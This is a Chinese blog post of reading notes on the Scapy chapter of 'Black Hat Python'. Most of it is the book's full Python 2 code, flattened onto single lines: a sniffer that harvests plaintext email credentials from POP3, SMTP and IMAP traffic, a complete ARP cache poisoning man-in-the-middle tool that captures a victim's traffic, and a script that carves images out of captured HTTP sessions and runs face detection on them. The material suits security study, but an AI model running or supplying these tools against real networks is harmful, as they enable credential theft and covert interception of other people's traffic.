读书笔记 -《Python 黑帽子》 ( 三 )

来源:互联网 发布:sky 态度 科技知乎 编辑:程序博客网 时间:2024/04/30 00:33



第四章 Scapy: 网络的掌控者

Scapy 的十分强大的,前两章的东西可以用 Scapy 用简单的几行代码就能实现。BPF,pcap 文件这些基本通用的东西在阅读本章前最后先自己补充一下。
Scapy有一个非常强大的功能就是读取 pcap 文件,然后对其中的会话做重组。在写嗅探工具的时候,要么用 libnids来做 tcp 的重组,要不自己写代码重组,这也是我一直在纠结的一些东西。scapy 以一种非常简单的方式提供了这样的功能。

窃取 Email 认证

作者首先用这一章简单介绍了 scapy 的威力。
email 使用的就是 SMTP、POP3、IMAP这些协议,这些协议里面使用了一些明文的关键字,通过这些关键字,可以找到用户名、密码这样的信息。
思路就是使用 scapy 来做嗅探,使用 BPF 过滤一些数据,然后在这些数据里面找关键字。

代码也是很简单易懂,其中TCP 是 Scapy 定义的, packet 也是捉取数据后的参数,一个类实例。


import threadingfrom scapy.all import *# our packet callbackdef packet_callback(packet):    if packet[TCP].payload:        mail_packet = str(packet[TCP].payload)        if "user" in mail_packet.lower() or "pass" in mail_packet.lower():            print "[*] Server: %s" % packet[IP].dst            print "[*] %s" % packet[TCP].payload# fire up our sniffersniff(filter="tcp port 110 or tcp "             ""             ""             " 25 or tcp port 143", prn=packet_callback, store=0)

利用 Scapy 进行 ARP 缓存投毒

作者说『ARP 投毒是黑客工具箱中最古老最有效的攻击方式之一』。原理也是很简单,通过发送 arp 报文,欺骗目标机,使目标机以为,拥有网关 ip 地址的 mac 地址,为黑客所使用的机器的 mac 地址。这样目标机会把所有流量发给黑客而不是网关。黑客开启 ip 转发功能,把目标机发送过来的数据转发给网关,这应在不影响目标机上网的情况下,拿到了目标机的所有发出的流量,通过嗅探,可以分析发现这些流量中的内容。

本节的内容就是写一个 arp 欺骗的工具

from scapy.all import *import osimport sysimport threadinginterface    = "en1"target_ip    = ""gateway_ip   = ""packet_count = 1000poisoning    = Truedef restore_target(gateway_ip,gateway_mac,target_ip,target_mac):    # slightly different method using send    print "[*] Restoring target..."    send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5)    send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=5)def get_mac(ip_address):    responses,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)    # return the MAC address from a response    for s,r in responses:        return r[Ether].src    return Nonedef poison_target(gateway_ip,gateway_mac,target_ip,target_mac):    global poisoning    poison_target = ARP()    poison_target.op   = 2    poison_target.psrc = gateway_ip    poison_target.pdst = target_ip    poison_target.hwdst= target_mac    poison_gateway = ARP()    poison_gateway.op   = 2    poison_gateway.psrc = target_ip    poison_gateway.pdst = gateway_ip    poison_gateway.hwdst= gateway_mac    print "[*] Beginning the ARP poison. [CTRL-C to stop]"    while poisoning:        send(poison_target)        send(poison_gateway)        time.sleep(2)    print "[*] ARP poison attack finished."    return# set our interfaceconf.iface = interface# turn off outputconf.verb  = 0print "[*] Setting up %s" % interfacegateway_mac = get_mac(gateway_ip)if gateway_mac is None:    print "[!!!] Failed to get gateway MAC. Exiting."    sys.exit(0)else:    print "[*] Gateway %s is at %s" % (gateway_ip,gateway_mac)target_mac = get_mac(target_ip)if target_mac is None:    print "[!!!] Failed to get target MAC. Exiting."    sys.exit(0)else:    print "[*] Target %s is at %s" % (target_ip,target_mac)# start poison threadpoison_thread = threading.Thread(target=poison_target, args=(gateway_ip, gateway_mac,target_ip,target_mac))poison_thread.start()try:    print "[*] Starting sniffer for %d packets" % packet_count    bpf_filter  = "ip host %s" % target_ip    packets = sniff(count=packet_count,filter=bpf_filter,iface=interface)except KeyboardInterrupt:    passfinally:    # write out the captured packets    print "[*] Writing packets to arper.pcap"    wrpcap('arper.pcap',packets)    poisoning = False    # wait for poisoning thread to exit    time.sleep(2)    # restore the network    restore_target(gateway_ip,gateway_mac,target_ip,target_mac)    sys.exit(0)

处理 PCAP 文件

这一节的内容我感觉是比较多,不太那么纯粹了,竟然利用 opencv 来做人脸识别。
这一节代码的功能是提取 pcap 文件中的 tcp 会话,从中找到 http 数据,再找到图片数据,把图片存入本地,然后使用 opencv 识别这些图片,查看这些图片是不是人脸。
这一节我最欣赏的是 scpay 对会话重组功能实现的,真的是非常好用,其它的功能不是那么吸引人了。

根据我描述的功能,再去读这些代码就比较简单了。具体的实现细节涉及到了 opencv 的使用,http 协议的格式等。不了解这些知识,自己上网搜索补充后,就能看懂了。

import reimport zlibimport cv2from scapy.all import *pictures_directory = "pic_carver/pictures"faces_directory    = "pic_carver/faces"pcap_file          = "bhp.pcap"def face_detect(path,file_name):        img     = cv2.imread(path)        cascade = cv2.CascadeClassifier("haarcascade_frontalface_alt.xml")        rects   = cascade.detectMultiScale(img, 1.3, 4, cv2.cv.CV_HAAR_SCALE_IMAGE, (20,20))        if len(rects) == 0:                return False        rects[:, 2:] += rects[:, :2]    # highlight the faces in the image            for x1,y1,x2,y2 in rects:        cv2.rectangle(img,(x1,y1),(x2,y2),(127,255,0),2)    cv2.imwrite("%s/%s-%s" % (faces_directory,pcap_file,file_name),img)        return Truedef get_http_headers(http_payload):    try:        # split the headers off if it is HTTP traffic        headers_raw = http_payload[:http_payload.index("\r\n\r\n")+2]        # break out the headers        headers = dict(re.findall(r"(?P<name>.*?): (?P<value>.*?)\r\n", headers_raw))    except:        return None    if "Content-Type" not in headers:        return None    return headersdef extract_image(headers,http_payload):    image      = None    image_type = None    try:        if "image" in headers['Content-Type']:            # grab the image type and image body            image_type = headers['Content-Type'].split("/")[1]            image = http_payload[http_payload.index("\r\n\r\n")+4:]            # if we detect compression decompress the image            try:                if "Content-Encoding" in headers.keys():                    if headers['Content-Encoding'] == "gzip":                        image = zlib.decompress(image,16+zlib.MAX_WBITS)                    elif headers['Content-Encoding'] == "deflate":                        image = zlib.decompress(image)            except:                pass        except:        return None,None    return image,image_typedef http_assembler(pcap_file):    carved_images   = 0    faces_detected  = 0    a = rdpcap(pcap_file)    sessions      = a.sessions()        for session in sessions:        http_payload = ""        for packet in sessions[session]:            try:                if packet[TCP].dport == 80 or packet[TCP].sport == 80:                    # reassemble the stream into a single buffer                    http_payload += str(packet[TCP].payload)            except:                pass        headers = get_http_headers(http_payload)        if headers is None:            continue        image,image_type = extract_image(headers,http_payload)        if image is not None and image_type is not None:                            # store the image            file_name = "%s-pic_carver_%d.%s" % (pcap_file,carved_images,image_type)            fd = open("%s/%s" % (pictures_directory,file_name),"wb")            fd.write(image)            fd.close()            carved_images += 1            # now attempt face detection            try:                result = face_detect("%s/%s" % (pictures_directory,file_name),file_name)                if result is True:                    faces_detected += 1            except:                pass    return carved_images, faces_detectedcarved_images, faces_detected = http_assembler(pcap_file)print "Extracted: %d images" % carved_imagesprint "Detected: %d faces" % faces_detected
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